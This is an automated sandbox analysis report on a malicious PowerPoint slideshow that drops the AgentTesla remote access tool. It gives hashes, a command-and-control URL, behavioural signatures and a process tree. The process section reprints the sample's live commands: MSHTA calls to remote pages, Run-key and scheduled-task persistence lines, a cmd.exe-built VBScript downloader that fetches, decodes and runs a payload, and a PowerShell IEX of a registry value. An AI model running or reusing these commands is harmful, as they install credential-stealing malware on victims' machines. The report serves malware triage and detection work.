Analysis
-
max time kernel
118s -
max time network
138s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
05-03-2021 10:09
Static task
static1
Behavioral task
behavioral1
Sample
25.pps
Resource
win7v20201028
Behavioral task
behavioral2
Sample
25.pps
Resource
win10v20201028
General
-
Target
25.pps
-
Size
100KB
-
MD5
c30e4c2f1fa54d2ef33b728ab424eeb5
-
SHA1
78de8719ed871189a4a79f4d37b6f664dbd7ed29
-
SHA256
8db5da6f4ee55565df9d436ab0052eaebab54a915929835e839c513e6c658e9f
-
SHA512
03266e5d5f717c7042e45a0703771eb66d72bfd2751309c27ca9162c1924bca360cf9b49522ea93484fa6c9e4a5ac46d32dcec1b65e7e1396aacc6d0528b18e0
Malware Config
Extracted
agenttesla
http://103.133.105.179/3232/inc/62120b2819c6f4.php
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.exeping.exeping.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4036 880 MSHTA.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1232 880 ping.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4128 880 ping.exe POWERPNT.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4560-65-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla behavioral2/memory/4560-66-0x0000000000437DEE-mapping.dmp family_agenttesla -
Blocklisted process makes network request 15 IoCs
Processes:
MSHTA.exeWScript.exePowershell.exeflow pid process 32 4036 MSHTA.exe 34 4036 MSHTA.exe 36 4036 MSHTA.exe 38 4036 MSHTA.exe 39 4036 MSHTA.exe 41 4036 MSHTA.exe 43 4036 MSHTA.exe 48 4036 MSHTA.exe 50 4036 MSHTA.exe 52 4036 MSHTA.exe 54 4036 MSHTA.exe 55 4036 MSHTA.exe 57 688 WScript.exe 59 688 WScript.exe 66 3160 Powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
jsc.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
MSHTA.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run MSHTA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)|IEX\"\", 0 : window.close\")" MSHTA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@bublicamukajuka.blogspot.com/p/300.html\"\", 0 : window.close\")" MSHTA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/300.html\"\", 0 : window.close\")" MSHTA.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/300.html\"\", 0 : window.close\")" MSHTA.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Powershell.exedescription pid process target process PID 3160 set thread context of 4560 3160 Powershell.exe jsc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1392 4036 WerFault.exe MSHTA.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEwinword.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winword.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
winword.exePOWERPNT.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS winword.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 880 POWERPNT.EXE 3576 winword.exe 3576 winword.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
WerFault.exePowershell.exejsc.exepid process 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 1392 WerFault.exe 3160 Powershell.exe 3160 Powershell.exe 3160 Powershell.exe 4560 jsc.exe 4560 jsc.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
WerFault.exePowershell.exejsc.exedescription pid process Token: SeDebugPrivilege 1392 WerFault.exe Token: SeDebugPrivilege 3160 Powershell.exe Token: SeIncreaseQuotaPrivilege 3160 Powershell.exe Token: SeSecurityPrivilege 3160 Powershell.exe Token: SeTakeOwnershipPrivilege 3160 Powershell.exe Token: SeLoadDriverPrivilege 3160 Powershell.exe Token: SeSystemProfilePrivilege 3160 Powershell.exe Token: SeSystemtimePrivilege 3160 Powershell.exe Token: SeProfSingleProcessPrivilege 3160 Powershell.exe Token: SeIncBasePriorityPrivilege 3160 Powershell.exe Token: SeCreatePagefilePrivilege 3160 Powershell.exe Token: SeBackupPrivilege 3160 Powershell.exe Token: SeRestorePrivilege 3160 Powershell.exe Token: SeShutdownPrivilege 3160 Powershell.exe Token: SeDebugPrivilege 3160 Powershell.exe Token: SeSystemEnvironmentPrivilege 3160 Powershell.exe Token: SeRemoteShutdownPrivilege 3160 Powershell.exe Token: SeUndockPrivilege 3160 Powershell.exe Token: SeManageVolumePrivilege 3160 Powershell.exe Token: 33 3160 Powershell.exe Token: 34 3160 Powershell.exe Token: 35 3160 Powershell.exe Token: 36 3160 Powershell.exe Token: SeIncreaseQuotaPrivilege 3160 Powershell.exe Token: SeSecurityPrivilege 3160 Powershell.exe Token: SeTakeOwnershipPrivilege 3160 Powershell.exe Token: SeLoadDriverPrivilege 3160 Powershell.exe Token: SeSystemProfilePrivilege 3160 Powershell.exe Token: SeSystemtimePrivilege 3160 Powershell.exe Token: SeProfSingleProcessPrivilege 3160 Powershell.exe Token: SeIncBasePriorityPrivilege 3160 Powershell.exe Token: SeCreatePagefilePrivilege 3160 Powershell.exe Token: SeBackupPrivilege 3160 Powershell.exe Token: SeRestorePrivilege 3160 Powershell.exe Token: SeShutdownPrivilege 3160 Powershell.exe Token: SeDebugPrivilege 3160 Powershell.exe Token: SeSystemEnvironmentPrivilege 3160 Powershell.exe Token: SeRemoteShutdownPrivilege 3160 Powershell.exe Token: SeUndockPrivilege 3160 Powershell.exe Token: SeManageVolumePrivilege 3160 Powershell.exe Token: 33 3160 Powershell.exe Token: 34 3160 Powershell.exe Token: 35 3160 Powershell.exe Token: 36 3160 Powershell.exe Token: SeDebugPrivilege 4560 jsc.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 880 POWERPNT.EXE 880 POWERPNT.EXE 3576 winword.exe 3576 winword.exe 3576 winword.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERPNT.EXEMSHTA.execmd.exePowershell.exedescription pid process target process PID 880 wrote to memory of 4036 880 POWERPNT.EXE MSHTA.exe PID 880 wrote to memory of 4036 880 POWERPNT.EXE MSHTA.exe PID 880 wrote to memory of 1232 880 POWERPNT.EXE ping.exe PID 880 wrote to memory of 1232 880 POWERPNT.EXE ping.exe PID 880 wrote to memory of 3576 880 POWERPNT.EXE winword.exe PID 880 wrote to memory of 3576 880 POWERPNT.EXE winword.exe PID 4036 wrote to memory of 3848 4036 MSHTA.exe cmd.exe PID 4036 wrote to memory of 3848 4036 MSHTA.exe cmd.exe PID 3848 wrote to memory of 688 3848 cmd.exe WScript.exe PID 3848 wrote to memory of 688 3848 cmd.exe WScript.exe PID 4036 wrote to memory of 3176 4036 MSHTA.exe schtasks.exe PID 4036 wrote to memory of 3176 4036 MSHTA.exe schtasks.exe PID 4036 wrote to memory of 3160 4036 MSHTA.exe Powershell.exe PID 4036 wrote to memory of 3160 4036 MSHTA.exe Powershell.exe PID 4036 wrote to memory of 3160 4036 MSHTA.exe Powershell.exe PID 880 wrote to memory of 4128 880 POWERPNT.EXE ping.exe PID 880 wrote to memory of 4128 880 POWERPNT.EXE ping.exe PID 3160 wrote to memory of 4560 3160 Powershell.exe jsc.exe PID 3160 wrote to memory of 4560 3160 Powershell.exe jsc.exe PID 3160 wrote to memory of 4560 3160 Powershell.exe jsc.exe PID 3160 wrote to memory of 4560 3160 Powershell.exe jsc.exe PID 3160 wrote to memory of 4560 3160 Powershell.exe jsc.exe PID 3160 wrote to memory of 4560 3160 Powershell.exe jsc.exe PID 3160 wrote to memory of 4560 3160 Powershell.exe jsc.exe PID 3160 wrote to memory of 4560 3160 Powershell.exe jsc.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\25.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\MSHTA.exeMSHTA http://12384928198391823%12384928198391823@j.mp/dokdwkkwkdwkokwaskdoaskdokkdl2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\FIX.VBS", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"4⤵
- Blocklisted process makes network request
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/300.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4036 -s 28963⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
-
C:\Program Files\Microsoft Office\Root\Office16\winword.exewinword2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\ping.exeping 127.0.0.12⤵
- Process spawned unexpected child process
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868MD5
50308e654d10f196ff97f70c8ae32be8
SHA144af0ff1918b729945b6b7052250f13cfe2e154a
SHA256bb4aa4afd64c31f895454eb788ddab2d6da854e80b59d55822cd7beb6b3d0ccb
SHA512ba8f253774cb7438361a48f4e671a0417ae450095f062761e6a4bd5f9a422f4276af28ec3ab7135db24843600276fb7fa41284753bc6feda6aeb22ac45ad32a4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868MD5
c9a852c59c41561e1dbf015f4a36569b
SHA1880ca939178abe3937d99ee09fda70ea17b78354
SHA256b10d818ec975707276d77326e36f2c0d686b37fc726ef5e03ff6e53b0c4c5fbc
SHA5122fe322e8c99e9b9bcfca5d7543bfa6f52bc54c4e846abde777fc1a91ae37cc6bec2a860b73158fe3b5aa2b99b6b96dc473760da3114082d48ffeb5d0c8e8b3a7
-
C:\Users\Public\SiggiaW.vbsMD5
49744d1b597f85a2691eeeccab3f5ec9
SHA153be659955bdf552d103ddd2251f97920c4830bd
SHA25609af8affea2e91779fc5bd8e45c8eb4274f6cb0fe78cb96c77586f988958fb6f
SHA5127d6036c802670bca691b26e3f22badfce85641354d67d460d38ff26edef248bcc6a51bf81406b11f2b6972525f8af6dfdcc26f298438280d001b03292f767e3f
-
memory/688-16-0x0000000000000000-mapping.dmp
-
memory/880-4-0x00007FF920240000-0x00007FF920250000-memory.dmpFilesize
64KB
-
memory/880-5-0x00007FF920240000-0x00007FF920250000-memory.dmpFilesize
64KB
-
memory/880-6-0x00007FF941E60000-0x00007FF942497000-memory.dmpFilesize
6.2MB
-
memory/880-23-0x00007FF9424A0000-0x00007FF94407D000-memory.dmpFilesize
27.9MB
-
memory/880-3-0x00007FF920240000-0x00007FF920250000-memory.dmpFilesize
64KB
-
memory/880-2-0x00007FF920240000-0x00007FF920250000-memory.dmpFilesize
64KB
-
memory/880-31-0x00007FF920240000-0x00007FF920250000-memory.dmpFilesize
64KB
-
memory/880-30-0x00007FF920240000-0x00007FF920250000-memory.dmpFilesize
64KB
-
memory/880-29-0x00007FF920240000-0x00007FF920250000-memory.dmpFilesize
64KB
-
memory/880-28-0x00007FF920240000-0x00007FF920250000-memory.dmpFilesize
64KB
-
memory/1232-8-0x0000000000000000-mapping.dmp
-
memory/1392-20-0x0000023A16370000-0x0000023A16371000-memory.dmpFilesize
4KB
-
memory/3160-34-0x0000000007420000-0x0000000007421000-memory.dmpFilesize
4KB
-
memory/3160-41-0x0000000008C00000-0x0000000008C01000-memory.dmpFilesize
4KB
-
memory/3160-25-0x0000000006DF0000-0x0000000006DF1000-memory.dmpFilesize
4KB
-
memory/3160-22-0x00000000734E0000-0x0000000073BCE000-memory.dmpFilesize
6.9MB
-
memory/3160-26-0x0000000000CE0000-0x0000000000CE1000-memory.dmpFilesize
4KB
-
memory/3160-27-0x0000000000CE2000-0x0000000000CE3000-memory.dmpFilesize
4KB
-
memory/3160-64-0x0000000007A50000-0x0000000007A56000-memory.dmpFilesize
24KB
-
memory/3160-62-0x000000000A510000-0x000000000A511000-memory.dmpFilesize
4KB
-
memory/3160-60-0x000000000A520000-0x000000000A521000-memory.dmpFilesize
4KB
-
memory/3160-59-0x000000007F080000-0x000000007F081000-memory.dmpFilesize
4KB
-
memory/3160-32-0x0000000006BE0000-0x0000000006BE1000-memory.dmpFilesize
4KB
-
memory/3160-33-0x0000000006D80000-0x0000000006D81000-memory.dmpFilesize
4KB
-
memory/3160-58-0x000000000A430000-0x000000000A431000-memory.dmpFilesize
4KB
-
memory/3160-35-0x0000000007670000-0x0000000007671000-memory.dmpFilesize
4KB
-
memory/3160-36-0x0000000007550000-0x0000000007551000-memory.dmpFilesize
4KB
-
memory/3160-37-0x0000000007DE0000-0x0000000007DE1000-memory.dmpFilesize
4KB
-
memory/3160-57-0x0000000007A50000-0x0000000007A51000-memory.dmpFilesize
4KB
-
memory/3160-18-0x0000000000000000-mapping.dmp
-
memory/3160-40-0x0000000007FE0000-0x0000000007FE1000-memory.dmpFilesize
4KB
-
memory/3160-24-0x0000000001140000-0x0000000001141000-memory.dmpFilesize
4KB
-
memory/3160-42-0x0000000009990000-0x0000000009991000-memory.dmpFilesize
4KB
-
memory/3160-43-0x00000000096F0000-0x00000000096F1000-memory.dmpFilesize
4KB
-
memory/3160-44-0x0000000009740000-0x0000000009741000-memory.dmpFilesize
4KB
-
memory/3160-45-0x0000000009F30000-0x0000000009F31000-memory.dmpFilesize
4KB
-
memory/3160-46-0x000000000AAB0000-0x000000000AAB1000-memory.dmpFilesize
4KB
-
memory/3160-47-0x0000000000CE3000-0x0000000000CE4000-memory.dmpFilesize
4KB
-
memory/3160-49-0x0000000009EB0000-0x0000000009EE3000-memory.dmpFilesize
204KB
-
memory/3176-17-0x0000000000000000-mapping.dmp
-
memory/3576-9-0x0000000000000000-mapping.dmp
-
memory/3576-13-0x00007FF941E60000-0x00007FF942497000-memory.dmpFilesize
6.2MB
-
memory/3848-15-0x0000000000000000-mapping.dmp
-
memory/4036-7-0x0000000000000000-mapping.dmp
-
memory/4128-21-0x0000000000000000-mapping.dmp
-
memory/4560-65-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/4560-66-0x0000000000437DEE-mapping.dmp
-
memory/4560-67-0x00000000734E0000-0x0000000073BCE000-memory.dmpFilesize
6.9MB
-
memory/4560-71-0x0000000004C30000-0x0000000004C31000-memory.dmpFilesize
4KB
-
memory/4560-72-0x0000000004E30000-0x0000000004E31000-memory.dmpFilesize
4KB
-
memory/4560-73-0x0000000004E10000-0x0000000004E11000-memory.dmpFilesize
4KB
-
memory/4560-75-0x0000000006490000-0x0000000006491000-memory.dmpFilesize
4KB